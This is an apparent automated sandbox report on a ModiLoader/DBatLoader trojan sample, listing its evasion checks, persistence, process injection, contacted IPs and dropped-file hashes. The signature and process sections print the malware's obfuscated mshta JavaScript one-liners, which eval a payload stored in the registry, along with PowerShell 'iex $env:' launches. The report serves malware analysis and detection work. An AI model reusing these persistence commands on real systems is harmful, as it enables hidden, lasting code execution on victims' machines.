Malware Analysis Report

2024-08-06 14:34

Sample ID 240529-11zwqsbf5w
Target 821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118
SHA256 6b959a28b0588409d90e02999113bd442cae3298bad61947d19ccd0787e97736
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6b959a28b0588409d90e02999113bd442cae3298bad61947d19ccd0787e97736

Threat Level: Known bad

The file 821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

Process spawned unexpected child process

ModiLoader, DBatLoader

Looks for VirtualBox drivers on disk

Looks for VirtualBox Guest Additions in registry

ModiLoader Second Stage

Checks for common network interception software

Looks for VMWare Tools registry key

Drops startup file

Checks BIOS information in registry

Deletes itself

Maps connected drives based on registry

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Modifies registry class

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-29 22:07

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-29 22:07

Reported

2024-05-29 22:10

Platform

win7-20240508-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A (61 identical rows)

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94d0f9.lnk C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\7358d4\\e5ae70.lnk\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:CTuP3WwXE=\"E3dS\";ON51=new%20ActiveXObject(\"WScript.Shell\");yG6AaqF=\"Bqn07tEe7P\";WN1b2i=ON51.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\bfow\\\\niegp\");HB9U4EYuxQ=\"tif5F8k\";eval(WN1b2i);hgKZTY1d=\"z0FUa9FYiS\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:yvPQdz5=\"u6W37k\";G9h=new%20ActiveXObject(\"WScript.Shell\");s9wgXmvL=\"HjCiBk\";GbE56c=G9h.RegRead(\"HKCU\\\\software\\\\bfow\\\\niegp\");WiwqjSWh6=\"zyVWE8rTX\";eval(GbE56c);HbMcl3Ut1v=\"ZLpelf5Ik6\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2764 set thread context of 756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 756 set thread context of 872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.1879f4f\ = "2070de" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\2070de\shell\open\command\ = "mshta \"javascript:kP4tH1gV=\"pSiBNCdh\";z6X=new ActiveXObject(\"WScript.Shell\");QF8SiQ2O=\"zzcZs\";z0JTv2=z6X.RegRead(\"HKCU\\\\software\\\\bfow\\\\niegp\");nRHIzdf2=\"A5cPTi4\";eval(z0JTv2);CT4ywsegt=\"T\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\.1879f4f C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A (63 identical rows)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2724 wrote to memory of 2764 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (4 identical rows)
PID 2764 wrote to memory of 756 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe (8 identical rows)
PID 756 wrote to memory of 872 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe (8 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:BAp0P5bD="Y3xX";B4E=new%20ActiveXObject("WScript.Shell");tN9RBav1="0";qbM9m=B4E.RegRead("HKLM\\software\\Wow6432Node\\dzCxnE\\nX53dQDNdz");emmirl1vD="4hoqDuYy8W";eval(qbM9m);Gs3Q3OHT="hdekCOFs";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:xnptzdx

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
N/A 10.47.119.64:80 tcp
ZA 196.8.28.53:80 tcp
CO 186.82.32.27:80 tcp
CN 115.149.183.38:80 tcp
US 35.124.9.90:80 tcp
CL 152.172.250.149:80 tcp
US 67.63.180.79:8080 tcp
US 67.118.54.214:8080 tcp
US 48.99.233.161:80 tcp
FR 176.145.87.137:8080 tcp
US 30.199.73.252:80 tcp
US 139.104.185.201:80 tcp
US 70.11.128.174:80 tcp
NO 152.90.199.220:80 tcp
US 128.150.15.53:80 tcp
US 26.27.95.176:80 tcp
N/A 10.239.189.224:80 tcp
FI 135.181.209.151:80 tcp
GB 136.225.83.44:80 tcp
RU 217.171.152.88:80 tcp
ES 84.89.20.77:80 tcp
US 215.251.188.206:80 tcp
CA 99.221.172.48:80 tcp
US 56.118.45.188:80 tcp
US 69.128.139.9:80 tcp
AT 80.120.96.28:80 tcp
US 66.151.149.23:80 tcp
JP 58.183.44.192:443 tcp
NO 134.47.152.39:80 tcp
AE 91.72.252.192:80 tcp
SG 115.66.219.28:80 tcp
US 173.49.30.18:443 tcp
US 56.90.14.145:80 tcp
TW 1.160.193.5:80 tcp
AU 124.170.27.31:80 tcp
US 50.150.117.50:80 tcp
CN 161.189.48.110:80 tcp
US 137.200.241.75:80 tcp
CA 153.53.79.59:80 tcp
JP 158.215.106.18:80 tcp
US 38.206.177.217:8080 tcp
JP 126.84.220.34:80 tcp
DZ 105.102.205.233:80 tcp
US 24.153.235.253:80 tcp
DE 91.67.205.214:80 tcp
US 158.151.137.252:80 tcp
US 166.235.207.97:80 tcp
GB 31.93.194.219:443 tcp
US 55.252.136.17:80 tcp
TR 88.237.181.13:80 tcp
IN 59.99.77.77:443 tcp
PL 213.17.156.12:80 tcp
DE 84.160.17.43:80 tcp
US 214.57.119.167:80 tcp
US 70.21.93.162:80 tcp
ZA 197.68.220.233:80 tcp
US 7.110.141.203:80 tcp
IT 84.221.90.195:443 tcp
CA 96.21.79.249:443 tcp
CA 205.195.34.157:80 tcp
MX 201.123.111.3:8080 tcp
NL 89.99.126.234:80 tcp
TW 123.241.223.86:80 tcp
TW 120.114.103.88:80 tcp
BR 181.77.246.230:80 tcp
US 48.246.238.195:80 tcp
JP 34.85.106.149:80 tcp
US 64.158.97.255:80 tcp
US 96.76.50.150:80 tcp
IT 93.61.151.6:80 tcp
US 67.251.118.174:8080 tcp
GB 132.153.154.223:80 tcp
US 172.74.124.16:80 tcp
US 67.254.214.142:80 tcp
TW 223.140.125.188:80 tcp
HN 190.99.21.66:80 tcp
US 11.181.54.22:80 tcp
US 98.19.116.200:8080 tcp
US 21.150.27.100:80 tcp
US 135.38.70.222:80 tcp
CO 45.173.69.144:80 tcp
US 40.19.99.34:80 tcp
IT 5.88.106.48:80 tcp
BR 200.244.22.11:80 tcp
US 162.166.217.225:80 tcp
US 205.90.150.49:80 tcp
US 23.19.30.200:80 tcp
GB 158.125.74.128:80 tcp
GB 82.34.80.187:80 tcp
FR 80.13.49.85:80 tcp
CL 146.83.233.9:80 tcp
IN 117.219.116.3:80 tcp
CH 185.125.24.143:80 tcp
US 76.19.199.36:8080 tcp
KR 220.72.253.179:80 tcp
GB 195.99.15.196:80 tcp
CN 219.232.150.35:80 tcp
NG 105.121.151.217:80 tcp
SE 176.71.152.55:80 tcp
AU 203.206.192.171:80 tcp
US 64.193.143.246:80 tcp
US 55.57.22.246:80 tcp
CN 59.50.147.156:80 tcp
BR 179.92.209.67:8080 tcp
JP 221.96.145.174:443 tcp
US 47.202.220.138:80 tcp
US 19.26.34.13:80 tcp
US 165.245.219.31:80 tcp
IR 92.42.53.119:80 tcp
CN 121.47.218.75:80 tcp
SA 100.210.38.184:80 tcp
TW 220.141.126.240:80 tcp
FR 217.180.183.219:80 tcp
US 164.117.134.103:80 tcp
US 3.146.77.134:80 tcp
BR 179.104.167.164:80 tcp
US 204.162.32.204:80 tcp
US 128.221.213.155:80 tcp
US 18.24.104.166:80 tcp
AT 140.78.181.160:80 tcp
US 20.191.109.80:80 tcp
US 167.145.92.28:80 tcp
US 23.32.135.56:80 tcp
US 3.150.10.252:443 tcp
JP 114.152.234.105:80 tcp
DE 51.221.174.109:80 tcp
DE 84.141.132.71:80 tcp
ES 90.77.222.233:443 tcp
CN 120.48.224.240:80 tcp
US 156.134.89.108:80 tcp
AR 190.182.200.227:80 tcp
KR 221.158.13.109:80 tcp
US 23.54.144.119:80 tcp
DE 84.136.37.123:80 tcp
US 216.23.238.240:80 tcp
CN 222.42.13.114:80 tcp

Files

memory/1704-0-0x0000000000400000-0x000000000046C000-memory.dmp

memory/1704-1-0x0000000000530000-0x000000000056A000-memory.dmp

memory/1704-2-0x0000000000400000-0x000000000046C000-memory.dmp

memory/1704-4-0x00000000020F0000-0x00000000021C4000-memory.dmp

memory/1704-5-0x00000000020F0000-0x00000000021C4000-memory.dmp

memory/1704-3-0x00000000020F0000-0x00000000021C4000-memory.dmp

memory/1704-6-0x00000000020F0000-0x00000000021C4000-memory.dmp

memory/1704-8-0x00000000020F0000-0x00000000021C4000-memory.dmp

memory/1704-7-0x00000000020F0000-0x00000000021C4000-memory.dmp

memory/1704-9-0x00000000020F0000-0x00000000021C4000-memory.dmp

memory/2764-19-0x0000000006170000-0x0000000006244000-memory.dmp

memory/756-20-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-21-0x0000000000230000-0x000000000036E000-memory.dmp

memory/2764-23-0x0000000006170000-0x0000000006244000-memory.dmp

memory/756-24-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-38-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-45-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-46-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-44-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-43-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-42-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-41-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-40-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-39-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-37-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-36-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-35-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-34-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-33-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-54-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-57-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-63-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-55-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-53-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-52-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-51-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-32-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-31-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-30-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-29-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-28-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-27-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-26-0x0000000000230000-0x000000000036E000-memory.dmp

memory/756-25-0x0000000000230000-0x000000000036E000-memory.dmp

memory/872-64-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-65-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-77-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-66-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-67-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-68-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-81-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-82-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-80-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-79-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-78-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-76-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-75-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-74-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-73-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-72-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-71-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-70-0x0000000000130000-0x000000000026E000-memory.dmp

memory/872-69-0x0000000000130000-0x000000000026E000-memory.dmp

C:\Users\Admin\AppData\Local\7358d4\6d45a7.bat

MD5 14adc766d85da95cd0990ed6bcc1524d
SHA1 e3c8f83a8fbfea658c9139d3e670d609745fb848
SHA256 0245cf83462c2d8f2453beb1094af0133caee498c1ab5147ee361cb8a449c1c4
SHA512 b4172624d668b6c1e7519cca9cbb53645ecc8b9aa1e4908801fd81983b092ed7ad26e3e29047ff5dc4e7744ee9f08dc61765133fa5957926cb4518127f4b60b8

C:\Users\Admin\AppData\Roaming\e53183\8858ab.1879f4f

MD5 2a880d9ffacfb5a03bdcb409c2c9c78a
SHA1 c8bb1f79016573f9618c9452bdc5df405d3659d0
SHA256 cff123dab9320d1db27beb544dbbbf9fd24c23eb0df61d5212ddae57c6664b52
SHA512 dfee891287091599766fb8901d217c9fae1e5c0028e85718f7df3bb1462ebabd11c964d9ad5de1b898aef87479e4be0add9cbfddc856fabf4a689912c5df1020

C:\Users\Admin\AppData\Local\7358d4\e5ae70.lnk

MD5 7298e0387167c3dcd091b6d81b7669a7
SHA1 4373f5798221909986bc1216c68be0e91e5abeb2
SHA256 9b4174d31d8f2b1d55a7f73af3401ce6a5d14026b73065e98d7f3e4484d7463d
SHA512 6b3648468794a9a5d0cf7f4d2451a82fde239e59843dc25b0fd8c25a962f6451cb9f1ffd40aff16ed6f941c52dea4e3d511a79878c5a55c5e53f81db8a078cea

C:\Users\Admin\AppData\Local\7358d4\2d9c5e.1879f4f

MD5 cb5eadf560dc3b5aa149c7107893a8f7
SHA1 bddd7c974ce2c32ffaa7a1234791edafc16defd4
SHA256 1b0147420e2a24cccdc3836648fa3a67fcc5138fffd463a915886a280b4a35d7
SHA512 f517d8b296a6af3c2aac9b84a0e30a159de585673a65623a8b6f975ae29b8de8461f4b6df1150665c703f9e75af088a6452de11120f7f617363f8fb9f2f39550

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94d0f9.lnk

MD5 aa54e39149e392ed22125d1706f23fbc
SHA1 07533595a10fa8e129c01f0be80d17d370c3912a
SHA256 8c868e591e57a9616847f102c647e16f06fdb6d107b0a5540a37a6352e9775dd
SHA512 28f13c1cb6981313f1dc8de57db38734903939780d02ce14dc14673eaa918e7f458989eed29fbf364008c9f0943ceceae2a0190be406068c5fa5e9289bdb9aaa

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-29 22:07

Reported

2024-05-29 22:10

Platform

win10v2004-20240226-en

Max time kernel

10s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A (9 identical rows)

Processes

C:\Users\Admin\AppData\Local\Temp\821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\821aa0af9b1e448cb190cdb1f525f4b5_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:RD1LgzP0A="10yXp6";CT0=new%20ActiveXObject("WScript.Shell");gN8hICn="mcm2oW";xEo3g=CT0.RegRead("HKLM\\software\\Wow6432Node\\xo5Iengwng\\ivkcPXlF");F1tUbswb="dJNxfvsMe";eval(xEo3g);XmTJE0Ya6K="Uq1C";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:hmtbe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4472 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
GB 142.250.187.202:443 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

memory/2620-0-0x0000000000400000-0x000000000046C000-memory.dmp

memory/2620-1-0x0000000000AF0000-0x0000000000B2A000-memory.dmp

memory/2620-2-0x0000000000400000-0x000000000046C000-memory.dmp

memory/2620-3-0x0000000002420000-0x00000000024F4000-memory.dmp

memory/2620-7-0x0000000002420000-0x00000000024F4000-memory.dmp

memory/2620-8-0x0000000000400000-0x000000000046C000-memory.dmp

memory/2620-6-0x0000000002420000-0x00000000024F4000-memory.dmp

memory/2620-5-0x0000000002420000-0x00000000024F4000-memory.dmp

memory/2620-4-0x0000000002420000-0x00000000024F4000-memory.dmp

memory/2620-9-0x0000000002420000-0x00000000024F4000-memory.dmp

memory/2620-10-0x0000000002420000-0x00000000024F4000-memory.dmp

memory/4408-13-0x00000000052E0000-0x0000000005316000-memory.dmp

memory/4408-14-0x0000000005A30000-0x0000000006058000-memory.dmp

memory/4408-15-0x00000000058E0000-0x0000000005902000-memory.dmp

memory/4408-16-0x0000000006100000-0x0000000006166000-memory.dmp

memory/4408-17-0x0000000006170000-0x00000000061D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mttsfjg2.sgw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4408-27-0x0000000006220000-0x0000000006574000-memory.dmp

memory/4408-28-0x0000000006730000-0x000000000674E000-memory.dmp

memory/4408-29-0x0000000006780000-0x00000000067CC000-memory.dmp

memory/4408-30-0x0000000007F00000-0x000000000857A000-memory.dmp

memory/4408-31-0x0000000006C70000-0x0000000006C8A000-memory.dmp